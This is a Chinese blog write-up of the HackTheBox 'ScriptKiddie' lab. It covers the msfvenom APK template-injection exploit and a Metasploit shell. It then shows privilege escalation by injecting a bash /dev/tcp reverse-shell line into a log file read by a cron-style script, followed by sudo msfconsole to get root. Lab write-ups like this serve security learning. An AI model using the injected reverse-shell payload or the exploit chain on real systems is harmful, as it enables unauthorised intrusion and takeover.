HackTheBox-------ScriptKiddie

最新推荐文章于 2024-07-25 23:51:24 发布
最新推荐文章于 2024-07-25 23:51:24 发布
阅读量220 收藏
点赞数
分类专栏: Hack the box 文章标签: 安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CyhDl666/article/details/115533652
版权

文章目录

题记

  • 记录一次依葫芦画瓢的渗透测试
  • 第一次做渗透测试 有点兴奋~

信息收集

  • namp 扫描ip地址 发现开放的端口
    在这里插入图片描述
  • 访问一下端口
    在这里插入图片描述

漏洞寻找

  • 网页是一个在线的nmap工具(好像看过类似的CTF题目…)
  • 输入一个ip地址试试
    在这里插入图片描述
  • 是Nmap的7.80版本
  • 利用Exploit Database未发现有已知道的漏洞
  • 还有一个venom工具
    在这里插入图片描述
  • 利用Exploit Database发现存在APK模板注入 网上给了漏洞的利用 可以直接拿
    在这里插入图片描述
  • 在利用exp生成apk文件的时候 需要安装sudo apt-get install openjdk-11-jdk-headless
  • 执行成功会生成evil.apk文件
    在这里插入图片描述
  • 接着监听5000端口
    在这里插入图片描述
  • 上传evil.apk文件
    在这里插入图片描述
  • 监听成功
    在这里插入图片描述

漏洞利用

  • 获取用户的shell 这里我用了msf
    在这里插入图片描述
  • 接着去提升一下权限
python3 -c 'import pty;pty.spawn("/bin/bash")'
  • 获得了kid的权限
    在这里插入图片描述
  • 在获取kid权限后 发现了pwn用户 尝试获取其权限
  • 并且返校了一个sh脚本
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
  • 语句为真时执行nmap的扫描语句,否则将信息写入hackers文件
  • 接着我们利用这个去获取pwn的权限
echo "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/1234 0>&1' #" >> hackers
  • sudo -l发现可以利用msf去访root文件
    在这里插入图片描述
  • sudo msfconsole
  • /bin/bash
  • cd /
  • cd /root
  • 发现已经获取root权限了 okkk!!!
海上清辉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机渗透_hackthebox__Writeup -6
qq_34717555的博客
11-11 1146
host:10.10.10.138 nmap 扫描一下 这次也尝试了一下自己的选项和A 选项发现A 比自己设置的要好很多不过这样被发现的几率也大了一些 自己配置的可以有很多降低被发现的选项 # Nmap 7.70 scan initiated Tue Aug 6 20:47:35 2019 as: nmap -A -o nmap.scan 10. 10.10.138 Nmap scan ...
Pynuke128:我在2020年初制作的一个脚本小子脚本,由于种种原因,我试图隐藏它,以至于我想通过修改就可以破坏这个世界。 哦,我真是天真。 我最尴尬的Forkbomb项目
03-05
"Scriptkiddie"是指那些依赖他人编写或公开的恶意代码,而非自己独立创建的初级黑客。这暗示了Pynuke128的作者可能是出于好奇或炫耀技术,而非真正的恶意攻击。 对于Python37的提及,表明这个脚本是为Python 3.7...
Hack The Box——ScriptKiddie
热门推荐
江左盟的博客
02-15 1万+
简介 信息收集 使用nmap扫描目标主机端口及服务信息,发现5000端口运行着Werkzeug httpd 0.16.1 (Python 3.8.5)服务,操作系统为Ubuntu,如图: 访问5000端口发现是简单的黑客工具页面,如图: 使用Google搜索发现Werkzeug Debug Shell远程代码执行漏洞,但是该靶机并不适用。使用该页面的nmap扫描127.0.0.1,发现目标主机运行Nmap 7.80版本,如图: 使用Google和exploit-db搜索该版本漏洞.
HackTheBox - ScriptKiddie(CVE-2020-7384)
z4yn:)的博客
04-21 487
ScriptKiddie #0 信息收集 Namp 扫描端口,根据端口开放情况切入点应该在5000端口上。 ─[sg-vip-1]─[10.10.14.19]─[htb-z4yn@htb-2t3aamavbq]─[~] └──╼ [★]$ nmap 10.10.10.226 -p- Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-20 02:13 UTC Nmap scan report for 10.10.10.226 Host is up..
Lianwei 安全周报|2024.07.22
联蔚盘云的博客
07-22 764
新的一周又开始了,以下是本周「Lianwei周报」,我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件,保证大家不错过本周的每一个重点!
轨道式智能巡检机器人,助力综合管廊安全运维
配电房综合监控
07-25 656
管廊巡检往往处于昏暗、潮湿、幽闭且狭长的空间环境,巡检过程中容易遇到有毒有害气体、泄露的燃气和强电等危险,同时不可避免会对巡检人员的心理构成一定负面影响。)实时性:地下管廊短则几公里、长则数十公里,其内部空间结构复杂,具有设备多、定位难的特点。综合管廊内部环境复杂而恶劣,给水、排水、热力、燃气、电力、电信等管道排布其中,空间狭窄、昏暗、潮湿,甚至会出现有毒害气体泄漏的环境。)环境检测功能:基于各类环境传感器,对于廊体内温湿度、有害气体含量、空气含氧量、烟雾浓度、光照度、井盖等状态进行检测。
保障企业数据主权:安全可控的爬虫工具与管理平台
zhou6343178的博客
07-25 449
在数据驱动的时代,企业对数据的需求日益增长,但如何在保障数据主权的前提下高效采集数据?本文深入探讨了选择安全可控爬虫工具与管理平台的重要性,分析了关键特性,并提出实用建议,助力企业维护数据安全,实现数据价值最大化。
数据库安全:MySQL安全配置,MySQL安全基线检查加固
wangyuxiang946的博客
07-23 1923
MySQL基线检查,基线配置,安全加固
后台管理系统登录安全和权限要求
JAVA领域优质创作者,基于分片网络查询方法专利发明者。
07-25 569
启用MFA后,系统将要求输入用户名和密码(第一安全要素),再进行输入来自其 MFA设备的动态验证码(第二安全要素),双因子的安全认证将为您的账户提供更高的安全保护。传统的用户名和密码认证容易受到破解、盗取或暴力破解等攻击方式的威胁,而双因子认证可以提供额外的安全层次,确保只有授权用户才能访问账户或系统。通过采用双因子认证,企业可以增加用户账号的安全性,降低身份盗窃和欺诈行为的风险,提高用户对系统的信任度。这在网络安全是极不安全的。订单管理:用于管理订单信息,包括查看订单、修改订单状态、发货、退货、退款等。
气膜建筑的逃生通道设计与安全保障—轻空间
Skansi的博客
07-25 254
确保这类建筑的安全性,尤其是逃生通道的设计,是保障人员生命安全的关键。通过合理设计逃生通道、加强日常维护和应急演练,可以有效提升气膜建筑的安全性,保障人员的生命安全。定期组织应急疏散演练,提高人员逃生意识和技能,确保紧急情况下有序撤离。根据建筑面积和使用人数设计足够的逃生通道,确保人员能够迅速疏散。逃生通道应有清晰的标识和足够的照明,确保在紧急情况下易于找到。材料和结构应具备良好的防火性能,确保通道畅通无阻。逃生通道的宽度和高度应满足疏散需求,避免拥堵。安装应急照明设备和紧急广播系统,引导人员撤离。
探究大语言模型(LLM)漏洞和安全优秀实践
java_cjkl的博客
07-21 1123
你可能已听说过LLM强势亮相,至少ChatGPT就是代表。大语言模型(LLM)指语言处理模型。这类模型经过训练,可以执行各种各样的语言任务:翻译、文本生成和问题回答等。有几个LLM家族和架构,最著名的是GPT(生成式预训练Transformer)。每种 LLM都有各自的特定功能,但本文侧重介绍LLM普遍固有的安全问题。随着越来越多的公司集成LLM以增强用户体验或简化和加速内部流程,这种类型的集成特有的新漏洞随之出现。
企业产品网络安全建设日志0725
最新发布
KD的疯狂实验室
07-25 188
显然,这种说法是安全工作中的一个挑战。因为推动时间也蛮长了,做出了:只要升级一部分,易升级的组件即可。前天遇到的挑战是某后端部门排期出现问题,本应该做漏洞提升的时间被其他工作插入。测试团队需要进一步支持,因为组件升级,许可证升级以及后续的编码安全建立都是一串蚂蚱。基础的安全种子显然已经埋下。团队有人A提出,是否有必要按照某软件报的漏洞信息实施安全提升工作。我们的信息安全策略就是通过覆盖三防组件风险,降低我们产品自身的风险。特别是搬出来A之前在,其他企业的经验,即。安全宣讲和必要的沟通是无法回避的。
Docker 安全及日志管理(包含SSL证书)
weixin_62922268的博客
07-25 1035
目前常用的 Docker 版本都支持 Docker Daemon 管理宿主机 iptables 的,而且一旦启动进程加上 -p host_port:guest_port 的端口映射,Docker Daemon 会直接增加对应的 FORWARD Chain 并且 -j ACCEPT,而默认的 DROP 规则是在 INPUT 链做的,对 docker 没法限制,这就留下了很严重的安全隐患。3)客户端收到服务端证书后,会先用本地的CA证书校验证书的有效性,如果证书有效,则继续下一步操作,证书无效则显示告警信息。
网站被浏览器提示“不安全”的解决办法
ABCDEFK1234的博客
07-23 313
免费申请HTTPS证书
构建稳固与安全的网络环境:从微软蓝屏事件中的教训学习
xingyu_qie的专栏
07-22 526
微软蓝屏”事件为我们提供了宝贵的教训和警示,即使是最大的科技公司也难以完全避免软件缺陷带来的灾难性后果。建设一个稳固和安全的网络环境需要多方面的努力:从有效的软件更新管理到强化的紧急响应能力,再到全员安全意识的培养和文化建设。只有综合运用技术、流程和人员培训,我们才能更好地应对未来可能出现的类似挑战,保护我们的数字基础设施和社会运行的稳定性与安全性。
如何避免蓝屏?轻量部署,安全和业务连续性才能两不误
亚信安全官方账号的博客
07-23 553
轻量部署,安全和业务连续性才能两不误
从等保测评看行业安全趋势:洞察与预测
A526847的博客
07-23 584
从等保1.0到等保2.0,我们看到了保护范围的扩展、综合防御体系的构建、定级灵活性的增强以及定级流程的严格化。未来,随着新技术的不断涌现,等保测评的标准和方法还将继续更新和完善。云计算、物联网、大数据等新兴领域的发展,为等保测评提供了新的应用场景。因此,等保测评需要面向这些新兴领域,制定专门的测评标准和方法,确保其安全性得到有效保障。企业需要组建专业的测评团队,并对其进行必要的培训,以确保测评的准确性和有效性。等保测评将更加注重对新技术的评估和应用,确保新技术在提升系统安全性的同时,不会带来新的安全隐患。
数据传输安全--IPSEC
banliyaoguai的博客
07-23 873
默认使用IP地址作为身份标识(因为身份验证是在第五六个数据包中,但是我们在前面的几个数据包过程都需要提取预共享密钥计算,要是等身份标识的话等不下去了,所以只能看IP地址了,然后在第五六个数据包的时候再进行身份认证确认,所以这个东西也很怕NAT),这个身份标识和身份认证是不一样的,在IPSec中多使用预共享密钥进行身份认证,然后这个预共享密钥可能一个人和另外好几个人都有。注意:野蛮模式前两个数据包中的参数用来协商密钥信息,则第三个数据包可以进行加密传输,因为,身份信息是通过明文传递的,所以,安全性较低。
如何开启或者关闭 Windows 安全登录?
qq_57728300的博客
07-22 570
你知道 Windows 安全登录是什么吗?本文教你如何开启或者关闭它。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值